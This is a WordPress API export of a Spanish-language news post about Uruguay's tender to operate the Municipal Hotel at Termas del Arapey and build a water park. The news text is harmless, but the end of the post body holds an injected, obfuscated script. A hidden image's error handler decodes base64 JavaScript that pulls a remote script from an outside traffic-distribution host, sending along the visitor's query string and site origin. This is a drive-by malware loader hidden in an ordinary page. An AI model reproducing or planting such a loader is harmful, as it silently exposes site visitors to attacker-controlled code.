{"id":7772,"date":"2024-01-05T12:58:52","date_gmt":"2024-01-05T15:58:52","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=7772"},"modified":"2025-08-13T15:49:02","modified_gmt":"2025-08-13T18:49:02","slug":"llamado-para-explotacion-comercial-del-hotel-municipal-y-creacion-de-un-parque-acuatico-en-termas-del-arapey","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=7772","title":{"rendered":"Llamado para explotaci\u00f3n comercial del Hotel Municipal y creaci\u00f3n de un Parque Acu\u00e1tico en Termas del Arapey"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-18a8b2e2121fed9e68a6245aed97783f\" style=\"background-color:#053e60\"><em>El objetivo es reabrir el Hotel Municipal de Termas del Arapey, llev\u00e1ndolo a su esplendor; y agregar un atractivo con la construcci\u00f3n de un Parque Acu\u00e1tico, modernizando el parque termal.<\/em><\/h4>\n\n\n\n<p>La presentaci\u00f3n de los pliegos tuvo lugar el pasado jueves 21 de diciembre en la sede del Ministerio de Turismo, con la presencia del Ministro Tabar\u00e9 Viera, el Subsecretario Remo Monzeglio, el Intendente de Salto Andr\u00e9s Lima y la Directora de Promoci\u00f3n y Desarrollo de la Intendencia de Salto, Soledad Marazzano.<\/p>\n\n\n\n<p>El Ministro Viera coincidi\u00f3 \u201cen el diagn\u00f3stico y la propuesta del llamado desde el Estado con sus responsabilidades y roles, a la complementaci\u00f3n de la inversi\u00f3n privada, quien es la que multiplica recursos, que muchas veces no se tienen en un gobierno departamental ni en el gobierno nacional, se aporta una gesti\u00f3n, que en el turismo es mucho m\u00e1s eficaz\u201d. Adem\u00e1s subray\u00f3 la generaci\u00f3n de puestos de trabajo que tiene este proyecto y la importancia que tiene el destino termal en el desarrollo del turismo interno.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/01\/salto.jpeg\"><img decoding=\"async\" width=\"945\" height=\"709\" data-id=\"7774\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/01\/salto.jpeg\" alt=\"\" class=\"wp-image-7774\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/01\/salto.jpeg 945w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/01\/salto-300x225.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/01\/salto-768x576.jpeg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/01\/salto-80x60.jpeg 80w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/01\/salto-265x198.jpeg 265w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/01\/salto-696x522.jpeg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/01\/salto-560x420.jpeg 560w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/01\/salto-320x240.jpeg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/01\/salto-480x360.jpeg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/01\/salto-800x600.jpeg 800w\" sizes=\"(max-width: 945px) 100vw, 945px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/01\/Salto1_0.jpeg\"><img decoding=\"async\" width=\"945\" height=\"709\" data-id=\"7775\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/01\/Salto1_0.jpeg\" alt=\"\" class=\"wp-image-7775\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/01\/Salto1_0.jpeg 945w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/01\/Salto1_0-300x225.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/01\/Salto1_0-768x576.jpeg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/01\/Salto1_0-80x60.jpeg 80w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/01\/Salto1_0-265x198.jpeg 265w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/01\/Salto1_0-696x522.jpeg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/01\/Salto1_0-560x420.jpeg 560w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/01\/Salto1_0-320x240.jpeg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/01\/Salto1_0-480x360.jpeg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/01\/Salto1_0-800x600.jpeg 800w\" sizes=\"(max-width: 945px) 100vw, 945px\" \/><\/a><\/figure>\n<\/figure>\n\n\n\n<p>El Intendente Lima record\u00f3 un proceso similar con el \u201cOasis Termal\u201d, establecimiento que pertenece a la comuna salte\u00f1a y la idea de repetirlo con el hotel municipal, el cual posee 54 habitaciones, funcion\u00f3 hasta la llegada de la pandemia al Uruguay en 2020; \u201centendemos y tenemos la visi\u00f3n de que este tipo de tareas deben ser desarrolladas por quienes m\u00e1s conocen del tema, quienes m\u00e1s saben del tema, que es un privado, las prioridades o cometidos que debe asumir un gobierno departamental pasan por otro lado y no por la gesti\u00f3n de un hotel\u201d. Por otra parte, el jerarca manifest\u00f3 que quien se presente genera el pago de un canon que en principio deber\u00eda abonarse a la Intendencia, \u201clo que estamos planteando es que durante los primeros a\u00f1os, no se abonar\u00e1 a la Intendencia, sino que se destinar\u00e1 a la construcci\u00f3n del parque acu\u00e1tico, con el objetivo de diversificar la oferta\u201d. Adem\u00e1s destac\u00f3 las inversiones p\u00fablico \u2013 privadas como la reconstrucci\u00f3n del acceso de 19 km a Termas de Arapey (con una inversi\u00f3n de m\u00e1s de U$S 3.000.000) y que en este momento est\u00e1 en pleno proceso de obra, las mejoras en una de las piscinas \u201cLa Piscina de los Tres Toboganes\u201d (con una inversi\u00f3n de los $20.000.000 con recursos genuinos departamentales y del Ministerio de Turismo).<\/p>\n\n\n\n<p>El llamado se abrir\u00e1 el 20 de marzo del 2024. Se podr\u00e1 visitar el hotel los d\u00edas 23 de enero y 20 de febrero a las 10 horas.<\/p>\n\n\n\n<p>El plazo de la concesi\u00f3n es a 25 a\u00f1os y los criterios de selecci\u00f3n ser\u00e1n: proyecto de desarrollo tur\u00edstico, canon, inversi\u00f3n y creaci\u00f3n de puestos de trabajo.<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"Licitaci\u00f3n Hotel Arapey\" width=\"640\" height=\"360\" src=\"https:\/\/www.youtube.com\/embed\/Kry23Sj6NPA?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/www.gub.uy\/ministerio-turismo\/comunicacion\/noticias\/llamado-para-explotacion-comercial-del-hotel-municipal-creacion-parque\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"345\" height=\"170\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/01\/Captura-web_5-1-2024_125639_www.gub_.uy_.jpeg\" alt=\"\" class=\"wp-image-7773\" style=\"width:268px;height:auto\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/01\/Captura-web_5-1-2024_125639_www.gub_.uy_.jpeg 345w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/01\/Captura-web_5-1-2024_125639_www.gub_.uy_-300x148.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/01\/Captura-web_5-1-2024_125639_www.gub_.uy_-324x160.jpeg 324w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/01\/Captura-web_5-1-2024_125639_www.gub_.uy_-320x158.jpeg 320w\" sizes=\"(max-width: 345px) 100vw, 345px\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El objetivo es reabrir el Hotel Municipal de Termas del Arapey, llev\u00e1ndolo a su esplendor; y agregar un atractivo con la construcci\u00f3n de un Parque Acu\u00e1tico, modernizando el parque termal. La presentaci\u00f3n de los pliegos tuvo lugar el pasado jueves 21 de diciembre en la sede del Ministerio de Turismo, con la presencia del Ministro [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":7775,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[12,30],"tags":[],"class_list":["post-7772","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-internacionales","category-temas-relacionados"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7772","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7772"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7772\/revisions"}],"predecessor-version":[{"id":10239,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7772\/revisions\/10239"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/7775"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7772"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7772"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7772"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}